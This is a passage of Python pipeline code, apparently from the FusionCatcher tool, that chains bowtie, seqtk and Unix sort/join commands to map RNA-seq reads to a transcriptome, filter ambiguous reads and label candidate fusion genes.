options.split_seqtk_subseq: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--input',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') job.add('--list',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('--output',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('>',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('reads_filtered_unique-mapped-genome.fq'),temp_path=temp_flag) job.clean(outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),temp_path=temp_flag) # job.add('printf',kind='program') # job.add('"Count reads left mapping on transcriptome and genome after filtering out those with better mappings on genome:\n---------------------------------------------------\n "',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='input') # job.add('|',kind='parameter') # job.add("echo $((`wc -l`/4))",kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # group reads which map on transcriptome in one FASTQ file #job.add('concatenate.py',kind='program') if job.iff(empty(outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq')),id="###reads_filtered_not-mapped-genome_mapped-transcriptome.fq###"): job.link( outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'), outdir('reads_filtered_mapped-transcriptome.fq'),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_mapped-transcriptome.fq'),kind='output') job.run() # job.add('printf',kind='program') # job.add('"Total count reads mapping on transcriptome (mapping on genome and not mapping on genome):\n---------------------------------------------------\n "',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_filtered_mapped-transcriptome.fq'),kind='input') # job.add('|',kind='parameter') # job.add("echo $((`wc -l`/4))",kind='parameter') # job.add('>>',info_file,kind='output') # job.run() ### ### ### if options.trim_3end_keep2 != 0: if job.iff(not empty(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map')),id = "#reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map#"): job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_transcriptome_trim2.txt'),kind='output') job.run() job.add('filter_splits.py',kind='program') job.add('-i',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),kind='input',temp_path=temp_flag) job.add('-x',outdir('reads_filtered_transcriptome_trim2.txt'),kind='input',temp_path=temp_flag) job.add('-o',outdir('reads_not-mapped_trim2.map.all.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_not-mapped_trim2.map.all.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('>',outdir('reads_not-mapped_trim2.map.all.sorted.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_not-mapped_trim2.map.all.sorted.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'),kind='output') job.run() else: job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),temp_path=temp_flag) job.clean(outdir('reads_not-mapped_trim2.map.all.txt'),temp_path=temp_flag) job.clean(outdir('reads_not-mapped_trim2.map.all.sorted.txt'),temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),temp_path=temp_flag) job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'),kind='output') job.run() # group reads' mappings on transcriptome in one big MAP file #job.add('concatenate.py',kind='program') job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='input',temp_path=temp_flag) if options.trim_3end_keep2 != 0: job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'),kind='input',temp_path=temp_flag) # trim2 # job.add('-',kind='parameter') # <== best mappings on transcriptome ####### #job.add('',outdir('reads_filtered_transcriptome.map'),kind='output') # <== best mappings on transcriptome ####### #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort #job.add('',outdir('reads_filtered_transcriptome.map'),kind='input',temp_path = temp_flag) job.add('>',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='output') job.run() if ( (options.homolog > 0 or (options.ambiguous_filtering)) and job.iff(not empty(outdir('reads_filtered_mapped-transcriptome.fq')),id = "#reads_filtered_mapped-transcriptome.fq#") ): ############################################################################## # ALL POSSIBLE MAPPINGS of all short reads on transcriptome ############################################################################## # map against the transcriptome the short reads which do not map on the genome # map using the transcript index (not mapped, unique alignment, multiple alignments) classic_1 = True job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','200',kind='parameter') #job.add('-v',options.mismatches,kind='parameter') job.add('-v', options.ambiguous_mismatches,kind='parameter') # stjude ##job.add('--strata',kind='parameter') # stjude ?????? job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') #job.add('--best',kind='parameter') if classic_1: job.add('--suppress','2,4,5,6,7,8',kind='parameter') # original else: job.add('--suppress','2,4,5,6,7',kind='parameter') # stjude job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads_filtered_mapped-transcriptome.fq'),kind='input',temp_path = temp_flag) #job.add('',outdir('reads_filtered_all-possible-mappings-transcriptome.map'),kind='output') # <== best mappings on transcriptome ####### XXX job.add('2>',outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_map.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() #XXX #job.add('|',kind='parameter') # XXX # sort the reads' all possible mappings on transcriptome by reads name #job.add('LC_ALL=C',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('grep',kind='parameter') # remove the ENST09 and ENST07 transcripts job.add('-v',kind='parameter') job.add('-F',kind='parameter') job.add('-f',datadir('custom_transcripts_mark.txt'),kind='input') job.add('|',kind='parameter') # XXX if classic_1: job.add('LC_ALL=C',kind='parameter') job.add('sed',kind='parameter') job.add("""'s/\\tEN.*\;EN/\\tEN/'""",kind='parameter') else: job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"substr($2,index($2,";")+1)"\\t"gsub(">","",$3)}'""",kind='parameter') # job.add('|',kind='parameter') # XXX # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') # XXX job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome.map'),kind='output') # <== best mappings on transcriptome ####### XXX job.run() # job.add('LC_ALL=C',kind='program') # XXX if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads_filtered_all-possible-mappings-transcriptome.map'),kind='input',temp_path=temp_flag) # XXX #job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_sorted.map'),kind='output') #job.run() # job.add('|',kind='parameter') # XXX # job.add('grep',kind='parameter') # remove the ENSG09 genes # job.add('-v',kind='parameter') # job.add('-F',kind='parameter') # job.add('-f',datadir('custom_genes_mark.txt'),kind='input') job.add('|',kind='parameter') # XXX job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') # XXX #job.add('|',kind='parameter') # XXX job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_sorted.map'),kind='output') job.run() #XXX # find the homolog genes using the reads job.add(_FC_+'find_homolog_genes.py',kind='program') job.add('--input',outdir('reads_filtered_all-possible-mappings-transcriptome_sorted.map'),kind='input',temp_path=temp_flag) # XXX #job.add('--input','-',kind='parameter') #job.add('--reads',outdir('log_number_of_reads_processed.txt'),kind='parameter',from_file='yes') job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--filter',datadir('custom_genes_mark.txt'),kind='input') job.add('--processes',options.processes,kind='parameter') job.add('--reads','1',kind='parameter') if not classic_1: job.add('--d1',kind='parameter') # stjude -- only 1 mismatch away #job.add('--output_offending_reads',outdir('list_offending_reads.txt'),kind='output') # if options.ambiguous_filtering: job.add('--output_offending_pair_reads',outdir('list_offending_reads_.txt'),kind='output') job.add('--output',outdir('list_candidates_ambiguous_homologous_genes_1.txt'),kind='output',temp_path='no' if options.homolog > 0 else temp_flag) # <== list of genes that might be homologous ####### job.run() # if options.ambiguous_filtering: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('list_offending_reads_.txt'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('list_offending_reads.txt'),kind='output') job.run() info(job, fromfile = outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_map.stdout.txt'), tofile = info_file, top = ["All mappings of reads (not mapped on genome + mapped uniquely on genome + mapped on transcriptome) on transcriptome", "-------------------------------------------------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag ) # get the number of reads mapping on transcriptome and genome crgt_ = 0 if job.run(): tag = '# reads processed:' crgt_ = [line.rstrip('\r\n') for line in file(outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'),'r') if line.lower().find(tag)!=-1] crgt_ = float(crgt_.pop(0).split(tag)[1].strip()) crgt = int(crgt_ * options.homolog) file(outdir('log_number_of_reads_processed.txt'),'w').write(str(crgt)) info(job, fromfile = outdir('log_number_of_reads_processed.txt'), tofile = info_file, top = ["Threshold for pairs of genes to be marked as 'similar_reads' (reference number: %d)" % (int(crgt_),), "-----------------------------------------------------------------------------------------"], bottom = "\n\n\n") ############################################################################## # ALL MAPPINGS of short reads (which map multiple times on genome) against the transcriptome ############################################################################## if job.iff(not empty(outdir('reads-filtered_multiple-mappings-genome.fq')),id="#reads-filtered_multiple-mappings-genome.fq#"): classic_2 = True job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','200',kind='parameter') job.add('-v',options.ambiguous_mismatches,kind='parameter') #job.add('--strata',kind='parameter') # stjude #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') #job.add('--best',kind='parameter') if classic_2: job.add('--suppress','2,4,5,6,7,8',kind='parameter') else: job.add('--suppress','2,4,5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads-filtered_multiple-mappings-genome.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple.map'),kind='output') # <== best mappings on transcriptome ####### job.add('2>',outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_multiple_map.stdout.txt'),kind='output',checksum='no') # job.add('2>&1',kind='parameter',checksum='no') #XXX #job.run() job.add('|',kind='parameter') # XXX # sort the reads' all possible mappings on transcriptome by reads name #job.add('awk',kind='program') #job.add("""awk '{print $1"\\t"substr($2,index($2,";")+1)"\\t"gsub(">","",$3)}'""",outdir('reads_filtered_all-possible-mappings-transcriptome.map'),kind='input',temp_path=temp_flag) if classic_2: job.add('LC_ALL=C',kind='parameter') job.add('sed',kind='parameter') job.add("""'s/\\tEN.*\;EN/\\tEN/'""",kind='parameter') else: job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"substr($2,index($2,";")+1)"\\t"gsub(">","",$3)}'""",kind='parameter') job.add('|',kind='parameter') # XXX job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') # XXX #job.add('|',kind='parameter') # XXX job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple.map'),kind='output') # <== best mappings on transcriptome ####### job.run() job.add('LC_ALL=C',kind='program') # XXX if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple.map'),kind='input',temp_path=temp_flag) # XXX #job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple_sorted.map'),kind='output') # XXX #job.run() # XXX job.add('|',kind='parameter') # XXX job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') # XXX job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple_sorted.map'),kind='output') # XXX job.run() #XXX # job.add('grep',kind='parameter') # remove the ENSG09 genes # job.add('-v',kind='parameter') # job.add('-F',kind='parameter') # job.add('-f',datadir('custom_genes_mark.txt'),kind='input') # job.add('|',kind='parameter') # XXX # find the homolog genes using the reads job.add(_FC_+'find_homolog_genes.py',kind='program') job.add('--input',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple_sorted.map'),kind='input',temp_path=temp_flag) #job.add('--input','-',kind='parameter') job.add('--reads','1',kind='parameter') if not classic_2: job.add('--d1',kind='parameter') # stjude -- only 1 mismatch away # using this requires bowtie '--suppress','4,5,6,7' instead of '--suppress','4,5,6,7,8' job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--filter',datadir('custom_genes_mark.txt'),kind='input') job.add('--processes',options.processes,kind='parameter') job.add('--output',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='output') # <== list of genes that might be homologous ####### job.run() info(job, fromfile = outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_multiple_map.stdout.txt'), tofile = info_file, top = ["Mapping all short reads (which already are mapping multiple times on genome) on transcriptome:", "----------------------------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) else: # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('>',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='output') job.run() # join the found homolog genes using the reads job.add(_FC_+'join_homolog_genes.py',kind='program') job.add('--input_1',outdir('list_candidates_ambiguous_homologous_genes_1.txt'),kind='input',temp_path=temp_flag) job.add('--input_2',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='input',temp_path=temp_flag) job.add('--reads',outdir('log_number_of_reads_processed.txt'),kind='parameter',from_file='yes') job.add('--all',outdir('all_ambiguous_genes.txt'),kind='output') job.add('--output',outdir('list_candidates_ambiguous_homologous_genes.txt'),kind='output',temp_path='no' if options.homolog else temp_flag) # <== list of genes that might be homologous ####### job.run() # remove the offending reads from the transcriptome mapping job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-v','2',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('list_offending_reads.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input') job.add('>',outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),kind='output') job.run() job.add(_FC_+'find_fusion_genes_map.py',kind='program') job.add('--input',outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),kind='input',temp_path=temp_flag) job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_no-offending-reads.txt'),kind='output') job.add('--output_fusion_reads',outdir('candidate_fusion-genes_no-offending-reads_supporting_paired-reads.txt'),kind='output',temp_path=temp_flag) job.run() # job.add('LC_ALL=C',kind='program') # job.add('join',kind='parameter') # job.add('-1','1',kind='parameter') # job.add('-2','1',kind='parameter') # job.add('-t',"'\t'",kind='parameter') # job.add('',outdir('list_offending_reads.txt'),kind='input',temp_path=temp_flag) # job.add('',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input') # job.add('>',outdir('reads_filtered_transcriptome_sorted-read_only-offending-reads.map'),kind='output') # job.run() # job.add(_FC_+'find_fusion_genes_map.py',kind='program') # job.add('--input',outdir('reads_filtered_transcriptome_sorted-read_only-offending-reads.map'),kind='input',temp_path=temp_flag) # job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_only-offending-reads.txt'),kind='output') # job.add('--output_fusion_reads',outdir('candidate_fusion-genes_only-offending-reads_supporting_paired-reads.txt'),kind='output') # job.run() # job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),temp_path='no') # job.clean(outdir('list_offending_reads.txt'),temp_path=temp_flag) else: job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),temp_path='no') job.add('touch',kind='program') job.add('',outdir('candidate_fusion-genes_no-offending-reads.txt'), kind='output') job.run() job.add('touch',kind='program') job.add('',outdir('list_candidates_ambiguous_homologous_genes.txt'), kind='output') job.run() ############################################################################## # FIND FUSION GENES ############################################################################## # find ALL fusion genes and transcripts where the offending reads have been removed # (offending reads = reads which map at least on two different genes) job.add(_FC_+'find_fusion_genes_map.py',kind='program') job.add('--input',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input') job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes.txt'),kind='output') job.add('--output_fusion_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='output') if options.reads_preliminary_fusions: job.add('--output_fusion_reads_split',outdir('pre-fusion'),kind='output') #job.add('--output_fusion_reads_simple',outdir('candidate_fusion-genes_no-offending-reads_supporting_paired-reads_only-ids.txt'),kind='output') job.add('--output_missing_mate_reads',outdir('candidate_fusion-genes_missing_mates.txt'),kind='output') job.run() if fragments_flag: job.add(_FC_+'fragments_fusion_genes.py',kind='program') job.add('--fusion-reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input') job.add('--minimum',spanning_pairs_minimum,kind='parameter') job.add('--fragments',outdir('candidate_fusion-genes_fragments.txt'), kind='output') job.run() else: # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('>',outdir('candidate_fusion-genes_fragments.txt'), kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('candidate_fusion-genes_fragments.txt'), kind='output') job.run() if options.reads_preliminary_fusions: job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('pre-fusion'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('pre-fusion_ids.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('pre-fusion_ids.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('originala-pre-fusion.fq'),kind='output') job.run() parts = [el.strip() for el in file(outdir('pre-fusion'),'r').readlines()] for par in parts: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('originala-pre-fusion.fq'),kind='input') job.add('',par,kind='input',temp_path=temp_flag) job.add('>',par+'.fq',kind='output') job.run() job.clean(outdir('originala-pre-fusion.fq'),temp_path=temp_flag) # label fusion genes -- known fusions job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes.txt'),kind='input',temp_path=temp_flag) job.add('--label','banned',kind='parameter') job.add('--filter_gene_pairs',datadir('banned.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_01.txt'),kind='output') job.run() # label fusion genes -- banned fusions job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_01.txt'),kind='input',temp_path=temp_flag) job.add('--label','known',kind='parameter') job.add('--filter_gene_pairs',datadir('known.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_02.txt'),kind='output') job.run() # label fusion genes -- no protein product # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_02.txt'),kind='input',temp_path=temp_flag) # job.add('--label','no_protein',kind='parameter') # job.add('--similar_gene_symbols',kind='parameter') # job.add('--filter_genes',datadir('genes_with_no_proteins.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_02a.txt'),kind='output') # job.run() # label fusion genes -- paralogs job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_02.txt'),kind='input',temp_path=temp_flag) job.add('--label','paralogs',kind='parameter') job.add('--filter_gene_pairs',datadir('paralogs.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_02b.txt'),kind='output') job.run() # label fusion genes -- potential readthrough job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_02b.txt'),kind='input',temp_path=temp_flag) job.add('--label','adjacent',kind='parameter') job.add('--filter_gene_pairs',datadir('adjacent_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_03.txt'),kind='output') job.run() # label fusion genes -- fully overlapping in Ensembl job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_03.txt'),kind='input',temp_path=temp_flag) job.add('--label','ensembl_fully_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('ensembl_fully_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_04.txt'),kind='output') job.run() # label fusion genes -- partially overlapping in Ensembl job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_04.txt'),kind='input',temp_path=temp_flag) job.add('--label','ensembl_partially_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('ensembl_partially_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_05.txt'),kind='output') job.run() # label fusion genes -- overlapping and on same strand in Ensembl job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_05.txt'),kind='input',temp_path=temp_flag) job.add('--label','ensembl_same_strand_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('ensembl_same_strand_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_06.txt'),kind='output') job.run() # label fusion genes -- similar region job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_06.txt'),kind='input',temp_path=temp_flag) job.add('--label','similar_reads',kind='parameter') 